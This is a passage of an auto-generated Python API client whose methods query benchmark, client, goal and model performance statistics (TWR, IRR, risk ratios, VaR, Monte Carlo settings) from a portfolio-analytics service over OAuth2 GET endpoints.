:param async_req bool
:param str benchmark_id: Benchmark Id - /benchmark (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str comparison_benchmark_id: comparison_benchmark_id
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: Stat type - /statistics endpoint
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_benchmark_performance_using_get_with_http_info(benchmark_id, **kwargs) # noqa: E501
else:
(data) = self.get_benchmark_performance_using_get_with_http_info(benchmark_id, **kwargs) # noqa: E501
return data
def get_benchmark_performance_using_get_with_http_info(self, benchmark_id, **kwargs): # noqa: E501
"""Benchmark Performance # noqa: E501
Get information on the performance of a benchmark using TWR (Time Weighted Return). You must provide the unique benchmark_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_benchmark_performance_using_get_with_http_info(benchmark_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str benchmark_id: Benchmark Id - /benchmark (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str comparison_benchmark_id: comparison_benchmark_id
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: Stat type - /statistics endpoint
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['benchmark_id', 'active_premium_period', 'annualized_return_period', 'comparison_benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_benchmark_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'benchmark_id' is set
if ('benchmark_id' not in params or
params['benchmark_id'] is None):
raise ValueError("Missing the required parameter `benchmark_id` when calling `get_benchmark_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'benchmark_id' in params:
path_params['benchmark_id'] = params['benchmark_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'comparison_benchmark_id' in params:
query_params.append(('comparison_benchmark_id', params['comparison_benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/benchmark/{benchmark_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
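    # Usage sketch (illustrative comment; ids and dates are placeholders):
    # a synchronous call for monthly TWR statistics over a one-year window.
    #
    #   import datetime
    #   perf = api_instance.get_benchmark_performance_using_get(
    #       'BENCH_UUID',                          # hypothetical benchmark_id
    #       period_type='M',                       # monthly statistics; codes are case-sensitive
    #       start_date=datetime.date(2020, 1, 1),
    #       end_date=datetime.date(2020, 12, 31))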
def get_client_performance_using_get(self, client_id, **kwargs): # noqa: E501
"""Client Performance # noqa: E501
Get information on the performance of a client using IRR (Internal Rate of Return). You must provide the unique client_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client_performance_using_get(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
        :param str client_id: Client Id - /client (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Client Benchmark or Tenant Benchmark Id - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: A stat type - /statistics
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
return data
def get_client_performance_using_get_with_http_info(self, client_id, **kwargs): # noqa: E501
"""Client Performance # noqa: E501
Get information on the performance of a client using IRR (Internal Rate of Return). You must provide the unique client_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client_performance_using_get_with_http_info(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
        :param str client_id: Client Id - /client (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Client Benchmark or Tenant Benchmark Id - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: A stat type - /statistics
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_client_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_client_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['client_id'] = params['client_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/client/{client_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
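    # Usage sketch (illustrative comment; ids are placeholders): client-level
    # IRR compared against a benchmark, restricted to a single statistic. The
    # stat code is hypothetical - valid codes come from the /statistics
    # endpoint.
    #
    #   perf = api_instance.get_client_performance_using_get(
    #       'CLIENT_UUID',               # hypothetical client_id
    #       benchmark_id='BENCH_UUID',   # optional client or tenant benchmark
    #       stat='sharpe_ratio')         # hypothetical stat code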
def get_goal_performance_using_get(self, client_id, goal_id, **kwargs): # noqa: E501
"""Goal Performance # noqa: E501
Get information on the performance of a goal using IRR (Internal Rate of Return). You must provide the unique goal_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_goal_performance_using_get(client_id, goal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client associated with the account - /client (required)
:param str goal_id: Goal Id - /account (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Client Benchmark or Tenant Benchmark Id - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param bool portfolio_goal: portfolio_goal
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: A stat type - /statistics
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_goal_performance_using_get_with_http_info(client_id, goal_id, **kwargs) # noqa: E501
else:
(data) = self.get_goal_performance_using_get_with_http_info(client_id, goal_id, **kwargs) # noqa: E501
return data
def get_goal_performance_using_get_with_http_info(self, client_id, goal_id, **kwargs): # noqa: E501
"""Goal Performance # noqa: E501
Get information on the performance of a goal using IRR (Internal Rate of Return). You must provide the unique goal_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_goal_performance_using_get_with_http_info(client_id, goal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client associated with the account - /client (required)
:param str goal_id: Goal Id - /account (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Client Benchmark or Tenant Benchmark Id - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param bool portfolio_goal: portfolio_goal
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: A stat type - /statistics
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id', 'goal_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'portfolio_goal', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_goal_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_goal_performance_using_get`") # noqa: E501
# verify the required parameter 'goal_id' is set
if ('goal_id' not in params or
params['goal_id'] is None):
raise ValueError("Missing the required parameter `goal_id` when calling `get_goal_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['client_id'] = params['client_id'] # noqa: E501
if 'goal_id' in params:
path_params['goal_id'] = params['goal_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'portfolio_goal' in params:
query_params.append(('portfolio_goal', params['portfolio_goal'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/goal/{goal_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
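    # Usage sketch (illustrative comment; ids are placeholders): goal-level
    # IRR. Both client_id and goal_id are required positional arguments;
    # portfolio_goal is the endpoint-specific boolean flag.
    #
    #   perf = api_instance.get_goal_performance_using_get(
    #       'CLIENT_UUID',        # hypothetical client_id
    #       'GOAL_UUID',          # hypothetical goal_id
    #       portfolio_goal=True)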
def get_model_performance_using_get(self, model_id, **kwargs): # noqa: E501
"""Model Performance # noqa: E501
Get information on the performance of a model using TWR (Time Weighted Return). You must provide the unique model_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_performance_using_get(model_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str model_id: Model Id - /model (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Tenant Benchmark Id - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
